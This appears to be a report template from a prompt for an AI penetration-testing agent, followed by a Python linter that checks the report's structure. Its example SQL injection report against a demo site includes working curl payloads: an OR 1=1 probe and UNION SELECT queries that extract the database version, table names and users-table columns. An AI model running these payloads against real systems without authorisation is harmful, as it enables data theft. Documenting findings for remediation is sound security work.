<exploitation_report>
When documenting an exploitation, put a report in the following format in the `exploitation_report` field of `extra_data` when calling `add_finding`:

- A title
- A summary of the vulnerability
- A detailed proof-of-concept: a short description, the exact steps needed to reproduce it, and code references if you created custom code
- Extracted information (if any)
- Remediation steps

<example>
# Exploitation report: SQL Injection on http://testphp.vulnweb.com/listproducts.php

## Vulnerability summary
<DETAILS_ABOUT_THE_INITIAL_VULNERABILITY>

## Proof-of-Concept

### Description
<DESCRIPTION>

### Details

Here are some details on how to exploit the vulnerability:

#### Initial POC (simple 'OR 1=1' injection)

**Request:**
```sh
curl -sk "http://testphp.vulnweb.com/listproducts.php?cat=1%27%20OR%20%271%27=%271"
```

**Response:**
```
...
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
        Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR '1'='1' at line 1%
```

**Explanation:**
The injected `OR` clause reaches the backend, and the response contains an SQL syntax error that echoes the payload, which means there is a probable path for injection.

#### Advanced exploitation

**Requests:**
```sh
# -G appends the --data-urlencode value to the URL as the query string,
# so the spaces and quotes in each payload are percent-encoded.

# Database version, name, user
curl -sk -G "http://testphp.vulnweb.com/listproducts.php" --data-urlencode "cat=-1 UNION SELECT 1,concat_ws(0x3a,@@version,database(),user()),3,4,5,6,7,8,9,10,11--"

# List all tables (same 11-column UNION as above)
curl -sk -G "http://testphp.vulnweb.com/listproducts.php" --data-urlencode "cat=-1 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 FROM information_schema.tables WHERE table_schema=database()--"

# List users table columns (same 11-column UNION as above)
curl -sk -G "http://testphp.vulnweb.com/listproducts.php" --data-urlencode "cat=-1 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_schema=database() AND table_name='users'--"
```

## Extracted information

### Database Details

<TABLE_1 (Property, Value)>

### Tables Found (8 tables)
<TABLE_2 (Table name, Description)>

### Users Table Columns (8 columns)
<TABLE_3 (Column, Sensitivity)>

## Remediation steps

Here is the priority table:
<PRIORITY_TABLE>

Here are the steps to fix the vulnerability:
### Step 1: add query validation to backend API
### Step 2: add thorough testing for query validation
### Step 3: ...
</example>
</exploitation_report>
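
A check for the report layout above, as an added example that is not part of the original template: `lint_report` (a hypothetical helper name) verifies that the required headings appear in order and flags template placeholders left unfilled. The sample report is constructed.

```python
import re
# Headings taken from the example report above, in order. "Extracted information"
# is left out because the format lists it as "(if any)".
REQUIRED = [
    (1, "Exploitation report: "),  # trailing space: a target must follow the colon
    (2, "Vulnerability summary"),
    (2, "Proof-of-Concept"),
    (3, "Description"),
    (3, "Details"),
    (2, "Remediation steps"),
]
HEADING = re.compile(r"^(#{1,6}) +(.*\S)\s*$")
# Template slots such as <DESCRIPTION> or <TABLE_1 (Property, Value)>.
PLACEHOLDER = re.compile(r"^<[A-Z][A-Z0-9_]*(?: \([^)]*\))?>?$")
FENCE = "`" * 3


def lint_report(markdown):
    """Return a list of problems; an empty list means the report passes."""
    headings, problems, in_fence = [], [], False
    for number, line in enumerate(markdown.splitlines(), start=1):
        if line.lstrip().startswith(FENCE):
            in_fence = not in_fence
            continue
        if in_fence:
            continue  # "# ..." inside a fence is a shell comment, not a heading
        match = HEADING.match(line)
        if match:
            headings.append((len(match.group(1)), match.group(2).lower()))
        elif PLACEHOLDER.match(line.strip()):
            problems.append(f"line {number}: unfilled placeholder {line.strip()}")
    if in_fence:
        problems.append("unterminated code fence")
    position = 0  # each required heading must come after the previous match
    for level, text in REQUIRED:
        for index in range(position, len(headings)):
            if headings[index][0] == level and headings[index][1].startswith(text.lower()):
                position = index + 1
                break
        else:
            problems.append(f"missing or out of order: {'#' * level} {text.strip()}")
    return problems


# Constructed sample: summary slot left unfilled, no remediation section.
SAMPLE = "\n".join([
    "# Exploitation report: SQL Injection on http://testphp.vulnweb.com/listproducts.php",
    "## Vulnerability summary", "<DETAILS_ABOUT_THE_INITIAL_VULNERABILITY>", "## Proof-of-Concept",
    "### Description", "Error-based injection in `cat`.", "### Details", FENCE + "sh", "# Database version", FENCE])
```

Running `lint_report(SAMPLE)` reports the unfilled summary placeholder on line 3 and the missing `## Remediation steps` heading.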
